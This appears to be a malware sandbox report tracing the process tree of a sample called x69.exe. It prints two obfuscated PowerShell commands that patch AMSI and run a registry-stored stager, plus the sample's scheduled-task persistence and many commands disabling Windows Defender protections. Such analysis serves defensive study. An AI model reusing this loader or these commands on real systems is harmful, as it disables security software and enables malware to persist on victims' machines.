C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1240 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:ZnUQyXlWTWsj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SfOXcgckuEyuGt,[Parameter(Position=1)][Type]$UTUpuZnLwH)$qUHKBJxSYNY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qUHKBJxSYNY.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+'e'+'cia'+[Char](108)+''+'N'+''+[Char](97)+'me,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$SfOXcgckuEyuGt).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$qUHKBJxSYNY.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+'S'+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$UTUpuZnLwH,$SfOXcgckuEyuGt).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $qUHKBJxSYNY.CreateType();}$TZAEQWjGXDmSs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+'o'+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'a'+[Char](102)+'e'+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+''+[Char](101)+'M'+'e'+''+'t'+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$KybpxFYdMHuPhT=$TZAEQWjGXDmSs.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+','+'S'+'t'+'a'+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TLljcKwpGUOLINyQcAm=ZnUQyXlWTWsj @([String])([IntPtr]);$aZjbOxNcdAXjGuztqCtRKd=ZnUQyXlWTWsj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mrKkGBnfHCD=$TZAEQWjGXDmSs.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$IPUohhNAJNPeQp=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$mrKkGBnfHCD,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$BsHbkCgAwWjGnYEJu=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$mrKkGBnfHCD,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$KNtegdh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IPUohhNAJNPeQp,$TLljcKwpGUOLINyQcAm).Invoke(''+[Char](97)+'ms'+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$XUgGyysuMXtOUCXGP=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$KNtegdh,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+'e'+''+[Char](114)+'')));$bYDKaTbANg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BsHbkCgAwWjGnYEJu,$aZjbOxNcdAXjGuztqCtRKd).Invoke($XUgGyysuMXtOUCXGP,[uint32]8,4,[ref]$bYDKaTbANg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XUgGyysuMXtOUCXGP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BsHbkCgAwWjGnYEJu,$aZjbOxNcdAXjGuztqCtRKd).Invoke($XUgGyysuMXtOUCXGP,[uint32]8,0x20,[ref]$bYDKaTbANg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4284 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4816
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:tTTOCAxvJSUr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nQlLGRSUSBCeKk,[Parameter(Position=1)][Type]$ywlBvduSJp)$LwbqvrTVtWC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'as'+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+'A'+'u'+''+[Char](116)+'o'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$LwbqvrTVtWC.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+'e'+'c'+''+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$nQlLGRSUSBCeKk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+'M'+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$LwbqvrTVtWC.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+'b'+'li'+'c'+''+[Char](44)+'Hid'+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'lot,'+'V'+''+'i'+''+'r'+'tu'+'a'+''+'l'+'',$ywlBvduSJp,$nQlLGRSUSBCeKk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $LwbqvrTVtWC.CreateType();}$wGrWkHPpWUHke=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+'m'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+'i'+'n'+'3'+[Char](50)+''+'.'+'Un'+'s'+'a'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$xtOMhiYmxIUDdI=$wGrWkHPpWUHke.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+''+[Char](111)+'cA'+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PZvdrMKapPOdAvvYEdz=tTTOCAxvJSUr @([String])([IntPtr]);$AyaPcHdgEbThyubIxsHfNV=tTTOCAxvJSUr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DwcusrERtjr=$wGrWkHPpWUHke.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+'l'+[Char](108)+'')));$aSASWrPVCjGGKu=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$DwcusrERtjr,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$nYHIVLkazvLFSzIKf=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$DwcusrERtjr,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+'t')));$yGQlvzU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aSASWrPVCjGGKu,$PZvdrMKapPOdAvvYEdz).Invoke(''+'a'+'m'+[Char](115)+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$EjalRQKfExDuBjCis=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$yGQlvzU,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+[Char](99)+'anB'+'u'+'f'+'f'+''+'e'+'r')));$SPdlteeqMb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nYHIVLkazvLFSzIKf,$AyaPcHdgEbThyubIxsHfNV).Invoke($EjalRQKfExDuBjCis,[uint32]8,4,[ref]$SPdlteeqMb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EjalRQKfExDuBjCis,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nYHIVLkazvLFSzIKf,$AyaPcHdgEbThyubIxsHfNV).Invoke($EjalRQKfExDuBjCis,[uint32]8,0x20,[ref]$SPdlteeqMb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5464
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:4324
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:5756
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:6972
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:7064
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:1816
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:3192
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:1052
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:2860
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:5684
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:460
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:4768
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:6076
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:5512
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:2584
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1320
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1544
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2604
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1588
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1156
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2336
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2740
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2852
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3584
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3664 -
C:\Users\Admin\AppData\Local\Temp\x69.exe"C:\Users\Admin\AppData\Local\Temp\x69.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4796
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5252
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:932
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5872
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2392
-
-
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4008 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\020251ea.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:3268 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3256
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7271.tmp\7272.tmp\7273.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:6028 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true5⤵PID:5160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5160
-
-
